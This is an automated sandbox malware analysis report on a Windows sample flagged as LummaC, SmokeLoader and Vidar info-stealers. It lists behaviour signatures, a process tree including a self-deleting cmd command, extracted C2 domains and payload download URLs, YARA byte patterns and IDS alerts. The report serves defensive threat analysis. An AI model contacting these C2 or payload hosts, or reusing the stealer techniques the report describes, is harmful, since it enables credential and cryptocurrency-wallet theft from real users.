Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe

Overview

General Information

Sample name:c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
Analysis ID:1447731
MD5:a93525f5f13c811e90c56492f5ac934a
SHA1:37fb7a8b8903f4b614cec214f0ff0c69c88a1864
SHA256:1b69a9c37210a79131c5cbcfaa4163fb5027989b4537b43a5a6cf6f40a4bab1a
Tags:exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe" MD5: A93525F5F13C811E90C56492F5AC934A)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 21AE.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\21AE.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • C9A7.exe (PID: 3944 cmdline: C:\Users\user\AppData\Local\Temp\C9A7.exe MD5: 5DEB4442AE617600891949163BB52F0A)
        • katA304.tmp (PID: 1436 cmdline: C:\Users\user\AppData\Local\Temp\katA304.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 6128 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7040 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • aarhevh (PID: 5576 cmdline: C:\Users\user\AppData\Roaming\aarhevh MD5: A93525F5F13C811E90C56492F5AC934A)
  • aarhevh (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\aarhevh MD5: A93525F5F13C811E90C56492F5AC934A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
          00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x264:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.C9A7.exe.42a7719.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              12.2.C9A7.exe.42a7719.1.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x201f0:$s1: JohnDoe
              • 0x201e8:$s2: HAL9TH
              12.2.C9A7.exe.2590000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                12.2.C9A7.exe.2590000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x201f0:$s1: JohnDoe
                • 0x201e8:$s2: HAL9TH
                12.2.C9A7.exe.2590000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 7 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\aarhevh, CommandLine: C:\Users\user\AppData\Roaming\aarhevh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\aarhevh, NewProcessName: C:\Users\user\AppData\Roaming\aarhevh, OriginalFileName: C:\Users\user\AppData\Roaming\aarhevh, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\aarhevh, ProcessId: 5576, ProcessName: aarhevh

                  Snort Signatures

                  Timestamp:05/27/24-00:27:15.022691
                  SID:2039103
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:18.565315
                  SID:2039103
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:54.236884
                  SID:2039103
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:19.604016
                  SID:2039103
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:22.060746
                  SID:2039103
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:39.895797
                  SID:2039103
                  Source Port:49778
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:25.797524
                  SID:2039103
                  Source Port:49721
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:58.334389
                  SID:2039103
                  Source Port:49781
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:16.965107
                  SID:2039103
                  Source Port:49784
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:34.843315
                  SID:2039103
                  Source Port:49787
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:52.939237
                  SID:2039103
                  Source Port:49780
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:26.891612
                  SID:2039103
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:47.866787
                  SID:2039103
                  Source Port:49779
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:24.492005
                  SID:2039103
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:14.005469
                  SID:2039103
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:17.401783
                  SID:2039103
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:06.967758
                  SID:2039103
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:49.450238
                  SID:2039103
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:27.743670
                  SID:2039103
                  Source Port:49776
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:05.849413
                  SID:2039103
                  Source Port:49782
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:24.792143
                  SID:2052787
                  Source Port:58021
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:42.022426
                  SID:2039103
                  Source Port:49788
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:23.451714
                  SID:2039103
                  Source Port:49785
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:19.578145
                  SID:2039103
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:14.086645
                  SID:2039103
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:16.337150
                  SID:2039103
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:27:50.525998
                  SID:2039103
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:11.305895
                  SID:2039103
                  Source Port:49783
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:28.702005
                  SID:2039103
                  Source Port:49786
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:47.787369
                  SID:2039103
                  Source Port:49789
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:29:33.855725
                  SID:2039103
                  Source Port:49777
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-00:30:56.387180
                  SID:2039103
                  Source Port:49790
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://whispedwoodmoodsksl.shop/apiAvira URL Cloud: Label: malware
                  Source: whispedwoodmoodsksl.shopAvira URL Cloud: Label: malware
                  Source: http://185.235.137.54/file/host_so.exeAvira URL Cloud: Label: malware
                  Source: https://whispedwoodmoodsksl.shop/apieAvira URL Cloud: Label: malware
                  Source: miniaturefinerninewjs.shopAvira URL Cloud: Label: malware
                  Source: https://whispedwoodmoodsksl.shop/XAvira URL Cloud: Label: malware
                  Source: http://45.129.96.86/file/update.exeAvira URL Cloud: Label: malware
                  Source: https://whispedwoodmoodsksl.shop/Avira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeAvira: detection malicious, Label: TR/AVI.AceCrypter.javlp
                  Source: C:\Users\user\AppData\Roaming\aarhevhAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                  Found malware configuration
                  Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
                  Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
                  Source: 21AE.exe.5640.5.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
                  Multi AV Scanner detection for domain / URL
                  Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                  Source: dbfhns.inVirustotal: Detection: 5%Perma Link
                  Source: https://65.109.242.59/Virustotal: Detection: 7%Perma Link
                  Source: http://guteyr.cc/tmp/index.phpVirustotal: Detection: 15%Perma Link
                  Source: https://whispedwoodmoodsksl.shop/apiVirustotal: Detection: 17%Perma Link
                  Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                  Source: http://185.235.137.54/file/host_so.exeVirustotal: Detection: 19%Perma Link
                  Source: https://whispedwoodmoodsksl.shop/apieVirustotal: Detection: 14%Perma Link
                  Source: https://65.109.242.59/lVirustotal: Detection: 5%Perma Link
                  Source: miniaturefinerninewjs.shopVirustotal: Detection: 19%Perma Link
                  Source: obsceneclassyjuwks.shopVirustotal: Detection: 18%Perma Link
                  Source: http://45.129.96.86/file/update.exeVirustotal: Detection: 20%Perma Link
                  Source: https://65.109.242.59/rVirustotal: Detection: 6%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Roaming\aarhevhReversingLabs: Detection: 55%
                  Multi AV Scanner detection for submitted file
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeReversingLabs: Detection: 55%
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeVirustotal: Detection: 59%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\aarhevhJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0041537E CryptUnprotectData,5_2_0041537E
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA4A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,13_2_6CA4A9A0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA444C0 PK11_PubEncrypt,13_2_6CA444C0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA14420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,13_2_6CA14420
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA44440 PK11_PrivDecrypt,13_2_6CA44440
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,13_2_6CA925B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,13_2_6CA2E6E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA28670 PK11_ExportEncryptedPrivKeyInfo,13_2_6CA28670
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA4A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,13_2_6CA4A650
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,13_2_6CA6A730
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA70180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,13_2_6CA70180
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA443B0 PK11_PubEncryptPKCS1,PR_SetError,13_2_6CA443B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA67C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,13_2_6CA67C00
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,13_2_6CA6BD30
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA27D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,13_2_6CA27D60
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA69EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,13_2_6CA69EC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA43FF0 PK11_PrivDecryptPKCS1,13_2_6CA43FF0

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeUnpacked PE file: 5.2.21AE.exe.400000.0.unpack
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2
                  Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
